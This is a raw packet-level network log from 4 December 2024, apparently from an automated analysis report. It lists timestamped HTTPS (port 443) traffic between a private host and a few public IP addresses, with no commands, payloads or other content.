                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.793932915 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.796289921 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.796458006 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.819663048 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.050244093 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.052109957 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.052552938 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.053853989 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.055943012 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.058118105 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.058305979 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.058326006 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.058336020 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.067212105 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.067514896 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.067578077 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.067660093 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.067852974 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.067964077 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.067976952 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.068291903 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.068304062 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.068314075 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.068326950 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.068852901 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.068865061 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.068877935 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.068886995 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.069042921 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.075058937 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.075172901 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.075270891 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.075283051 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.075472116 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.075486898 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.076694965 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.077805996 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.079027891 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.081115961 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.083235979 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.083470106 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.083570957 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.083585978 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.083735943 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.083980083 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.090596914 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.091026068 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.091059923 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.091136932 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.091149092 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.091419935 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.091432095 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.091443062 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.091453075 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.105803967 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.125286102 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.151638985 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.151799917 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.151839018 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.152349949 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.152571917 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.152698040 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.170721054 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.171330929 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.198714018 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.344294071 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.344393015 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.366487026 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.367511034 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.369076014 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.369548082 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.397265911 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.414634943 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.428205967 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.456099033 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.456185102 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.473887920 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.473978996 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.474066973 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.474078894 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.474396944 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.474411011 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.474422932 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.474628925 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.474808931 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.474821091 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.475087881 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.475099087 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.475109100 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.475464106 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.486263037 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.502149105 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.525240898 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.525278091 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.525289059 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.525298119 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.525374889 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.528362989 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.528563976 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.528633118 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.531758070 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.541385889 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.541481972 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.541507959 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.541517019 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.542104006 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.542234898 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.580396891 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.682710886 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.683672905 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.684178114 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.684639931 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.705173969 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.706116915 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.706296921 CET44354661162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.706391096 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.706851959 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.707370043 CET44354661162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.707952976 CET44354661162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.708096981 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.847593069 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.869942904 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.178848982 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.179056883 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.518671989 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.520586014 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.521289110 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.522738934 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.003608942 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.004127979 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.004398108 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.015065908 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.015573025 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.016843081 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.016985893 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.027477980 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.322060108 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.330096006 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.331016064 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.331034899 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.331336021 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.331352949 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.331366062 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.331377983 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.331391096 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.332123995 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.332134962 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.332145929 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.332158089 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.332169056 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.332180023 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.332479000 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.332669973 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.333049059 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.333060980 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.333071947 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.333085060 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.333096981 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.333107948 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.352339983 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.352991104 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.355632067 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.356123924 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.356137991 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.356151104 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.356164932 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.356178999 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.356322050 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.356460094 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.356477022 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.356488943 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.356502056 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.357760906 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.364124060 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.364135981 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.364406109 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.364607096 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.364659071 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.365179062 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.368333101 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.368447065 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.373601913 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.373620033 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.374048948 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.374125957 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.374139071 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.374151945 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.374218941 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.374228954 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.374241114 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.374253035 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.374795914 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.379031897 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.390949965 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.390966892 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.390980005 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.391242981 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.391254902 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.391267061 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.391278982 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.391433001 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.391825914 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.391838074 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.391849995 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.413899899 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.413929939 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.413943052 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.414242983 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.414254904 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.414266109 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.414267063 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.414278984 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.414825916 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.414839029 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.414849997 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.431447029 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.431476116 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.431488991 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.431771040 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.431818962 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.431830883 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.431843042 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.431854010 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.431865931 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.432122946 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.432476997 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.432488918 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.453094959 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.453113079 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.453126907 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.453361034 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.453373909 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.453385115 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.453830004 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.453840971 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.453852892 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.453864098 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.454133987 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.471364021 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.471484900 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.471498013 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.471729994 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.471745968 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.471757889 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.472279072 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.472291946 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.472313881 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.472325087 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.472495079 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.472786903 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.492435932 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.492472887 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.492486954 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.492779016 CET4436509323.209.72.42192.168.2.6
